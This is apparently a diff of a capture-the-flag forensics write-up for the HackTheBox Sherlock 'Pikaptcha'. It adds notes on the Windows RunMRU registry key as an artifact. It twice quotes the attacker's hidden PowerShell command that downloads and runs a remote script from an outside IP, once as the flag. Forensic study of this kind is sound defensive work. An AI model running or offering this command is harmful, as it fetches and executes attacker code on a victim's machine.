JT-Cybsersecurity/Hackthebox_Sherlocks/DFIR/Pikaptcha.md

 b   powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"\1
 ```

+### RunMRU Forensics
+RunMRU is a registry key contained in each user's registry hive.
+It logs each input when you run anything from the Run dialogue box (Win+R).
+For that reason, RunMRU is a known valuable forensics artifact to examine.
+Since it's an easy way of executing programs, the threat actor may have used it as a way to execute their payload or may have tricked a user into running the malicious command.

 ### Flag
 ```text
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"